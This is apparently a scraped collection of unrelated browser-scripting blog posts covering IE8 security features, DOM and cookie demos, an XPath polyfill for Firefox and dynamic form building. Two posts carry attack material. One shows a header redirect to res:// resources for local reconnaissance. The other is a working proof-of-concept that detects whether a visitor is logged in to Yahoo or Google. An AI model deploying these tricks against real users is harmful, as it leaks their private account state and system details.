用过Firefox+Zotero的都知道，推荐论文写作、信息整理归档必备！

详细信息全在这了：http://code.google.com/p/baiduzhuanli/

I had some fun today on Internet Explorer and tested the new IE8 also.
Along, I also compared the new security features to IE7. And there are many
things to say about both versions. Don’t get me started on the usability. To
be honest it looks horrible. Don’t know if you ever noticed it, but
selecting text with your mouse has become a real challenge. It has some
strange selection boundary which results in selecting text you don’t want to
select. Typically Microsoft, onto the security features. You might have
heard or read about a new feature called XDR that allows cross-domain
requests. If not, I’ll explain it here in short detail as well as the other
new features before I’m going into reverse engineering IE7 & IE8.

The XDR object.

xdr = new XDomainRequest();
xdr.open(’POST’, ‘http://www.mr.bigglesworth.com’);
xdr.send(data);
Now, Mr.Bigglesworth needs to approve the send XDomainRequest header, but we
can approve the call by returning this header to the server that requested
legitimacy:
Response.AppendHeader(”XDomainRequestAllowed”,”1″);
Great, XSS made easy. No need for hijacked iframes, css or images. Nope pure
Javascript does the trick for us. This obviously can bypass many XSS filters
in use today, so if you run one be sure to check this beast out. In my
opinion this will broaden the attack landscape since there are more ways of
launching XSS or spreading worms. The XDR object also returns the
responseText that gives access to:
xdr.onerror
xdr.ontimeout
xdr.onprogress
xdr.onload
xdr.timeout
Useful, if you’re into worms and all.
next, I saw that they implemented cross-document messaging in the form of
the object postMessage. Opera already has it, and from a security standpoint
I don’t trust it. It basically means that a webpage can write into another
page that is running in the same session and on the same host by attaching
an event listener. Spoofing comes to mind, and maybe other attacks as well.
The real question is of course: what is it for? I don’t know.
Implementing it is a breeze:
page 1:
var doc = document.getElementsByTagName(’iframe’)[0];
doc.contentWindow.postMessage(’Hello Mr. Bigglesworth!’);
page 2:
document.attachEvent(’onmessage’,function(e) {
if (e.domain == ‘example.com’) {
if (e.data == ‘Hello Mr. Bigglesworth!’) {
e.source.postMessage(’Meow! Meow! Dr. Evil!’);
} else {
alert(e.data);
}
}

});
Hash write access.
Another thing that caught my eye was write access to the hash of an url.
Doesn’t sound smart because I don’t want Javascript to manipulate the hash.
Not only can it be annoying, it can lead to security issues depending on the
setting of your website.

Webslices.

If I understand it correctly this feature allows users to favorite the slice
or put it in their feed reader. Better expect some buffer overflows here
since IE8 now listens for a tag called ‘hslice’ on any page it opens, would
be nice to fuzz this feature.
<div class=”hslice” id=”main”>
<h2 class=”entry-title”>All I want are friggin’ sharks with friggin’ lazer
beams attached to their heads! </h2>
</div>

GlobalStorage & SessionStorage.

IE8 jumped on the Mozilla bandwagon and implemented the Session object. I
can’t say I’m that impressed because I as I said before; allowing 10MB of
data to be stored in such object (XML file in IE8) isn’t smart. Let alone
the permanent storage of user tracking details, XSS worms and other
spy-ware.

IE8 GlobalStorage

<script>
var storage = globalStorage[location.hostname];
storage.some_string = ‘
Ladies and Gentlemen welcome to my underground lair.
I have gathered here before me the worlds deadliest assassins.
And yet each of you has failed to kill Austin powers.
That makes me angry. And when Dr. Evil get angry, Mr. Bigglesworth gets
upset.
And when Mr. Bigglesworth gets upset…people DIE!!!
Why must I be surrounded by freakin idiots. Mustafa, Frau Farbissina…
‘;
</script>

Reverse Engineering IE7 & IE8.

Okay, this is fun. I’m going to show you a couple things I found out about
Internet Explorer. First off IE8 prevents header forwards on files, pity
this was pretty ‘evil’ in MSIE 7 where it is still possible to change the
location of a file to a local file stored on your computer. It’s very
simple:
<?
header(”location: localfile “);
?>
And IE7 follows it, whereas IE8 refuses to follow.
The reason why this is dangerous is because of this XML file that contains
system information which we could parse. Useful for reconnaissance and
possibly other attack schemes.
<?
header(”location: res://ieframe.dll/24/123″);
?>
Results in IE7:
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes” ?>
- <!– Copyright (c) Microsoft Corporation
–>
- <assembly xmlns=”urn:schemas-microsoft-com:asm.v1″
xmlns:asmv3=”urn:schemas-microsoft-com:asm.v3″ manifestVersion=”1.0″>
<assemblyIdentity
name=”Microsoft.Windows.InetCore.ieframe”processorArchitecture=”x86″
version=”5.1.0.0″
type=”win32″ />
<description>Windows IE</description>
- <dependency>
- <dependentAssembly>
<assemblyIdentity
type=”win32″name=”Microsoft.Windows.Common-Controls”version=”6.0.0.0″
processorArchitecture=”*”
publicKeyToken=”6595b64144ccf1df” language=”*”
/>
</dependentAssembly>
</dependency>
- <trustInfo xmlns=”urn:schemas-microsoft-com:asm.v3″>
- <security>
- <requestedPrivileges>
<requestedExecutionLevel level=”asInvoker” uiAccess=”false” />
</requestedPrivileges>
</security>
</trustInfo>
- <asmv3:application>
- <asmv3:windowsSettings
xmlns=”http://schemas.microsoft.com/SMI/2005/WindowsSettings“>
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
If you notice correctly I read res://ieframe.dll/24/123 located on
ieframe.dll which is the IEDataObjectWrapper (InProcServer32) I don’t know
why they still allow this to be browsable, because you can resource it on
iframes, XML and as a Javascript source. So I went further to find all data
object in IE8 and a few in IE7.
IE7/8 data sources are:
res://ieframe.dll/MUI/1

res://ieframe.dll/TYPELIB/1

res://ieframe.dll/UIFILE/{20481,20482,20483,20484,20484,20485,20486,20487,39
216,41555}

res://ieframe.dll/WEVT_TEMPLATE/1

res://ieframe.dll/Version Info/1

res://ieframe.dll/23/ABOUT.js

res://ieframe.dll/23/ANALYZE.js

res://ieframe.dll/23/ANCHBRWS.js

res://ieframe.dll/23/DOCBROWS.js

res://ieframe.dll/23/ERROR.js

res://ieframe.dll/23/HTTPERRORPAGESSCRIPTS.js

res://ieframe.dll/23/IEERROR.js

res://ieframe.dll/23/IMGBROWS.js

res://ieframe.dll/23/INVALIDCERT.js

res://ieframe.dll/23/ORGFAV.js

res://ieframe.dll/23/PHISHSITE.js

res://ieframe.dll/23/POLICY.js

res://ieframe.dll/23/PREVIEW.js

res://ieframe.dll/preview.dlg (dialog)

res://ieframe.dll/23/PSTEMPLATES.js

res://ieframe.dll/24/123 (XML file)
IE6 has a few too:
res://mshtml.dll/REGINST/REGINST

res://mshtml.dll/23/ABOUT.MOZ

res://mshtml.dll/23/BLANK.HTM

res://mshtml.dll/23/REPOST.HTM
As well as others.
These are nice to play with some more, I haven’t digged any deeper yet but
this is quite nice to have a look at. So, enough building blocks to pentest
IE a little further. If you find anything notable, do let me know.

以前写的一小段代码，拿出来共享之，同时备忘

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<HTML>
<HEAD>
<TITLE>DOM attributes enumeration POC </TITLE>
<SCRIPT LANGUAGE=“JavaScript”>
<!–

function load_attributes()
{
    var attrs = document.getElementById(“text_id”).attributes;
    var div = document.getElementById(“attrs_div”);
    for(var attr in attrs ){
        div.innerHTML += “<li><a href=’javascript:load_attrib_value(\”“ + attr + “\”)’>”+ attr + “</a></li>”;
    }
}
function load_attrib_value(attrib)
{
    var attrs = document.getElementById(“text_id”).attributes;
    var namedItem = attrs.getNamedItem(attrib);
    if(namedItem)
        alert(attrib + ” = “ + namedItem.value);
    else
        alert(attrib + ” does not specified!”);
}
//–>
</SCRIPT>
</HEAD>

<BODY onload=load_attributes()>
<input id=“text_id” type=“text” value=“text_value” name=“text_box”>
<p>
Text has the following attributes:
<div id=“attrs_div”>
</div>
</BODY>
</HTML>

今天看到一篇有意思的文章，关于用js检测用户是否登入某些Web应用的方法，虽然原文没有给出具体的实现代码，但我经过了一些研究之后，试着写了一段POC，经测试只能在Firefox下使用。IE下的错误信息和Firefox的错误信息接口不一样，暂时没有想到办法利用。

测试地址在这里

附上POC源代码:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<meta name=”refer” content=”http://kentbrewster.com/patching-privacy-leaks/”>
<head>
<title> JavaScript WebSite Login Checker</title>

</head>

<body>
<script>
<!–
//hook firefox’s onerror event handler
window.onerror = err;

var sites = new Array(2);
sites[’http://mail.yahoo.com/’] = new Array(5);
sites[’http://mail.yahoo.com/’][”name”] = ‘Yahoo Mail (Beta)’;
sites[’http://mail.yahoo.com/’][”login_msg”] = ‘missing } in XML expression’;
sites[’http://mail.yahoo.com/’][”login_line”] = ‘12′;
sites[’http://mail.yahoo.com/’][”logout_msg”] = ’syntax error’;
sites[’http://mail.yahoo.com/’][”logout_line”] = ‘8′;

sites[’https://www.google.com/accounts/ManageAccount’] = new Array(5);
sites[’https://www.google.com/accounts/ManageAccount’][”name”] = ‘Google Account’;
sites[’https://www.google.com/accounts/ManageAccount’][”login_msg”] = ‘XML tag name mismatch (expected a)’;
sites[’https://www.google.com/accounts/ManageAccount’][”login_line”] = ‘144′;
sites[’https://www.google.com/accounts/ManageAccount’][”logout_msg”] = ‘missing = in XML attribute’;
sites[’https://www.google.com/accounts/ManageAccount’][”logout_line”] = ‘35′;

function check(loc) {
var script = document.createElement(’script’);
script.setAttribute(’src’, loc);
script.setAttribute(’type’,'text/javascript’);
var head = document.getElementsByTagName(”head”)[0];
head.appendChild(script);
}

function err(msg, loc, line) {

var res = document.getElementById(sites[loc].name);

if ((msg == sites[loc].login_msg) && (line == sites[loc].login_line)) {
res.innerHTML = ” Logged-in”;
} else if ((msg == sites[loc].logout_msg) && (line == sites[loc].logout_line)) {
res.innerHTML = ” Not Logged-in”;
} else {
res.innerHTML = ” Not Logged-in”;
}
window.stop();
}
// –>
function addSite(loc)
{
var results = document.getElementById(”results”);
var subdiv = document.createElement(”div”);
results.appendChild(subdiv);
var name = document.createElement(”span”);
name.innerHTML = sites[loc].name;
subdiv.appendChild(name);

var result = document.createElement(”span”);
result.setAttribute(”id”, sites[loc].name);
result.innerHTML = ” “;
subdiv.appendChild(result);
var button = document.createElement(”input”);
button.type=”button”;
button.value=”check”;
button.setAttribute(”onclick”,”check(’”+ loc +”‘)”);
subdiv.appendChild(button);
}

</script>
<div align=”center”>
<h1>JavaScript WebSite Login Checker</h1>

<div id=”results”></div>
<script>
for(var i in sites){
addSite(i);
}
</script>
</div>
</body>
</html>

一个JS操作Cookie的代码Demo，备忘&备查。

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>

<HTML>

<HEAD>

<TITLE> Cookie Read & Write Demo</TITLE>

<SCRIPT LANGUAGE=“JavaScript”>

<!–

var flag;

if(document.cookie){

flag = readCookie(“flag”);

}else{

alert(“shit!”);

createCookie(“flag”,“true”,10);

}
function test()

{

if(flag){

flag=false;

alert(“yes”);

eraseCookie(“flag”);

createCookie(“flag”,flag,10);

}else{

flag=true;

alert(“no”);

eraseCookie(“flag”);

createCookie(“flag”,flag,10);

}

}
function createCookie(name,value,days) {

if (days) {

var date = new Date();

date.setTime(date.getTime()+(days*24*60*60*1000));

var expires = “; expires=”+date.toGMTString();

}

else var expires = “”;

document.cookie = name+“=”+value+expires+“; path=/”;

}
function readCookie(name) {

var nameEQ = name + “=”;

var ca = document.cookie.split(‘;’);

for(var i=0;i < ca.length;i++) {

var c = ca[i];

while (c.charAt(0)==‘ ‘) c = c.substring(1,c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);

}

return null;

}
function eraseCookie(name) {

createCookie(name,“”,-1);

}
function alertCookie(name){

alert(readCookie(name));

}

//–>

</SCRIPT>

</HEAD>
<BODY>

<input type=button onclick=”alertCookie(‘flag’);“ value=“zz”>

<input type=button onclick=”test();“ value=“setCookie”>

</BODY>

</HTML>

今天写的一个js，目的是在用户关闭浏览器窗口的时候，向服务器发送一个消息
实际操作过程中，客户端这边的功能实现起来并不困难，仅是在解决浏览器兼容性的问题上花了点时间，现在的这个版本同时支持IE6和firefox 1.5
下面就是一个简单的demo性质的例子

Firefox默认不支持IE的XMLDOM提供的selectNodes和selectSingleNode方法。IE中可以通过这两个方法解析获得一系列Nodes或者一个单独的Node。下面的脚本可以扩展Firefox的XMLDocument和Element对象以支持这两个函数。

代码

selectNodes()

// check for XPath implementation if( document.implementation.hasFeature(”XPath”, “3.0″) ) { // prototying the XMLDocument XMLDocument.prototype.selectNodes = function(cXPathString, xNode) { if( !xNode ) { xNode = this; } var oNSResolver = this.createNSResolver(this.documentElement); var aItems = this.evaluate(cXPathString, xNode, oNSResolver,                           XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null) ;var aResult = []; for( var i = 0; i < aItems.snapshotLength; i++) {      aResult[i] = aItems.snapshotItem(i); } return aResult; } // prototying the Element Element.prototype.selectNodes = function(cXPathString) {     if(this.ownerDocument.selectNodes) {          return this.ownerDocument.selectNodes(cXPathString, this);     } else{         throw “For XML Elements Only”;    }  } }




selectSingleNode()

// check for XPath implementation if(document.implementation.hasFeature(”XPath”, “3.0″)) { // prototying the XMLDocument XMLDocument.prototype.selectSingleNode = function(cXPathString, xNode) {if( !xNode ) {    xNode = this; } var xItems = this.selectNodes(cXPathString, xNode);   if( xItems.length > 0 ) {     return xItems[0];   } else {     return null;   } } // prototying the Element Element.prototype.selectSingleNode = function(cXPathString) {    if(this.ownerDocument.selectSingleNode) {       return this.ownerDocument.selectSingleNode(cXPathString, this);    } else{      throw “For XML Elements Only”;}    } }






Example xml document

示例用文档:

用法示例

function test( oXML ) {    var xItems = oXML.responseXML.selectNodes(”//complex/node/test/text()”);    var sn = “XPath : //complex/node/test/text() \nMethod : selectNodes()\n”;    for( var i = 0; i < xItems.length; i++ ) {      sn += “index : “+ i + ” | value : ” + xItems[i].nodeValue + “\n”;    } alert( sn );    ssn = “XPath : //complex/node/test/text() \nMethod : selectSingleNode()\n”;    ssn+= oXML.responseXML.            selectSingleNode(”//complex/node/test/text()”).nodeValue;      alert( ssn ); }




原文链接：http://km0ti0n.blunted.co.uk/mozXPath.xap

最近，由于项目需要，需要在web页面的客户端动态生成表单元素。要求同时支持IE和firefox，而我之前从来没有接触过类似的任务，一切都是从零开始。现在已经完成了需求，特将实践过程中积累的经验在此分享一下。
对于动态HTML编程，IE实现了两套模型：一套是以操作innerHTML为主的狭义的DHTML，一套是以集合方式操作(appendChild)页面元素对象的DOM(Document Object Model)。DHTML方式(我本文说的DHTML都默认指的对于innerHTML进行操作的编程方式，不是广义的DHTML。) 直接操作html代码片断，主要靠Web程序员使用字符串拼接来生成页面元素，这是一种高效的动态页面操作方式，不过似乎少些编程逻辑的味道，代码中往往散布着大量不完整的html代码片断。而DOM方式进行动态页面编程，在逻辑上是一种对集合和元素对象的操作，编程逻辑比较清晰，不过效率上有一些差别。具体使用什么方式来实现动态Web页面，大多数情况下是个人的喜好问题。
先简单介绍一下我的客户需求：
动态生成的界面元素是一个表格，点击按钮增加一行，该行中包含一个按钮，点击后再删除该行。该表格的内容包含一个表单中，当提交表单的时候，后台程序将获得表格中的相应内容。
最开始我的实现思路是利用innerHTML，父对象我选择的是一个固定的table，这种方法在firefox 1.5.x中实践通过，但是在IE中，出现异常。
我用try…catch获得的异常消息是：“未知的运行时错误”，跟没说一样，逼视一下IE!
于是我在程序中另辟途径，先判断当前浏览器的类型，如果是firefox，则继续使用innerHTML的方法，否则用DOM树生成的方法。
注意，判断浏览器类型最好不要用navigator.appName来判断，我采用的是
if(document.all && document.getElementById)
{
//do IE
}
else
{
//do firefox
}
使用DOM，最常用的方法就是document.createElement(sTag)，sTag是一个合法的html标签名字(tagName)。我们创建好一个html元素对象后，对它的属性进行赋值，然后insertBefore或appendChild到页面的DOM对象树中。这里msdn提醒了几个注意事项：

1、不能通过编程方式动态创建frame和iframe元素(IE 5.0及以下)；
2、input元素被创建后默认的类型是input type=’text’；
3、需要使用其他类型的input元素，需要在把input对象放入DOM对象树之前给input.type赋予你希望的类型，否则在input insert或append进入DOM对象树后不能再修改；
4、button元素被创建后默认的类型是普通按钮，要使用其它类型按钮，需要遵循和问题3相同的注意事项；
5、不能为通过向元素对象赋值得方式，为元素对象添加NAME属性(这个在“细说HTML元素的ID和NAME属性详解”一文里也是提过的)。
6、sTag其实不只限于html标签名，任何合法的html元素语句都可以。

下面说一下我遇到的问题，当我在使用DOM方式进行动态页面创建的时候，发现不能使用普通的DOM方式为input type=’checkbox’和input type=’radio’赋初值。即下面的语句：
var input = document.createElement(’INPUT’);
input.type = ‘checkbox’;
input.checked = true;
document.body.appendChild(input);

input = document.createElement(’<INPUT checked>’);
input.type = ‘radio’;
document.body.appendChild(input);

不能得到我期望的效果：

，而只能得到:

。

而要得到我期望的效果，需要混合DHTML和DOM两种方式就是说我必须在sTag里就构建好的属性，使用如下代码：
var input = document.createElement(’<INPUT checked>’);
input.type = ‘checkbox’;
document.body.appendChild(input);

input = document.createElement(’<INPUT checked>’);
input.type = ‘radio’;
document.body.appendChild(input);

类似的，如果需要在创建的元素中支持js脚本调用，只需要采用类似以下的方法：

var input_4 = document.createElement(”<input name=’button’ onclick=’hide(\”para”+show_int+”\”);’>”);